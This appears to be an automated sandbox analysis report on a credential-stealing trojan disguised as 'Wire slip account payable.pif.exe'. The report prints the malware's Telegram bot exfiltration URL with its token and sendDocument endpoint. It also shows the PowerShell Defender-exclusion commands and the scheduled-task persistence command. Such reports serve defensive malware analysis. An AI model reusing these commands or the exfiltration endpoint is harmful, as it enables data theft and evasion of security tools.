                      Source: Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.000000000318E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/
                      Source: Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003188000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument
                      Source: Wire slip account payable.pif.exe, EQVRGq.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, SKTzxzsJw.cs.Net Code: rT6oF
                      Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, SKTzxzsJw.cs.Net Code: rT6oF

                      System Summary

                      barindex
                      Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_0155D51C0_2_0155D51C
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_0749CFF90_2_0749CFF9
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_074957580_2_07495758
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_074957680_2_07495768
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_074953300_2_07495330
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_074972780_2_07497278
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_07495FC70_2_07495FC7
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_07495FD80_2_07495FD8
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 0_2_07495BA00_2_07495BA0
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_011BEB388_2_011BEB38
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_011B4A708_2_011B4A70
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_011BACD98_2_011BACD9
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_011BDF708_2_011BDF70
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_011B3E588_2_011B3E58
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_011B41A08_2_011B41A0
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_068566108_2_06856610
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_068555A08_2_068555A0
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_06857DA08_2_06857DA0
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_0685B2488_2_0685B248
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_068530708_2_06853070
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_0685C1A08_2_0685C1A0
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_068576C08_2_068576C0
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_06855CFB8_2_06855CFB
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_0685E3C08_2_0685E3C0
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_068523488_2_06852348
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_068500408_2_06850040
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_069426488_2_06942648
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_0694EA688_2_0694EA68
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeCode function: 8_2_068500168_2_06850016
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_00C0D51C9_2_00C0D51C
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C1C3F99_2_06C1C3F9
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C157589_2_06C15758
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C157689_2_06C15768
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C172789_2_06C17278
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C153309_2_06C15330
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C15FC79_2_06C15FC7
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C15FD89_2_06C15FD8
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 9_2_06C15BA09_2_06C15BA0
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_02E441A014_2_02E441A0
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_02E44A7014_2_02E44A70
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_02E4EB3814_2_02E4EB38
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_02E43E5814_2_02E43E58
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_02E4DF7014_2_02E4DF70
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A2661014_2_06A26610
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A255A014_2_06A255A0
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A27DA014_2_06A27DA0
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A2B24B14_2_06A2B24B
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A2307014_2_06A23070
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A2C1A014_2_06A2C1A0
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A276C014_2_06A276C0
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A25CFB14_2_06A25CFB
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A2E3C014_2_06A2E3C0
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A2234814_2_06A22348
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A2004014_2_06A20040
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeCode function: 14_2_06A2000714_2_06A20007
                      Source: Wire slip account payable.pif.exeStatic PE information: invalid certificate
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1746285908.00000000077C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Wire slip account payable.pif.exe
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1738691173.00000000010BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Wire slip account payable.pif.exe
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename3f0b89ee-138d-4b54-97f8-124f3d6dbb52.exe4 vs Wire slip account payable.pif.exe
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1739600975.0000000002D8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename3f0b89ee-138d-4b54-97f8-124f3d6dbb52.exe4 vs Wire slip account payable.pif.exe
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1744164691.0000000005960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Wire slip account payable.pif.exe
                      Source: Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Wire slip account payable.pif.exe
                      Source: Wire slip account payable.pif.exe, 00000008.00000002.4157285814.0000000000D58000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Wire slip account payable.pif.exe
                      Source: Wire slip account payable.pif.exeBinary or memory string: OriginalFilenamezycH.exe6 vs Wire slip account payable.pif.exe
                      Source: Wire slip account payable.pif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Wire slip account payable.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: EQVRGq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gNRWAGnXV8menB1Yeo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gNRWAGnXV8menB1Yeo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@2/2
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile created: C:\Users\user\AppData\Roaming\EQVRGq.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeMutant created: \Sessions\1\BaseNamedObjects\mnwSasRZHhlnJVycRRnzapr
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile created: C:\Users\user\AppData\Local\Temp\tmp14C9.tmpJump to behavior
                      Source: Wire slip account payable.pif.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Wire slip account payable.pif.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Wire slip account payable.pif.exeReversingLabs: Detection: 63%
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile read: C:\Users\user\Desktop\Wire slip account payable.pif.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Wire slip account payable.pif.exe "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Users\user\Desktop\Wire slip account payable.pif.exe "C:\Users\user\Desktop\Wire slip account payable.pif.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\EQVRGq.exe C:\Users\user\AppData\Roaming\EQVRGq.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Users\user\Desktop\Wire slip account payable.pif.exe "C:\Users\user\Desktop\Wire slip account payable.pif.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeProcess created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
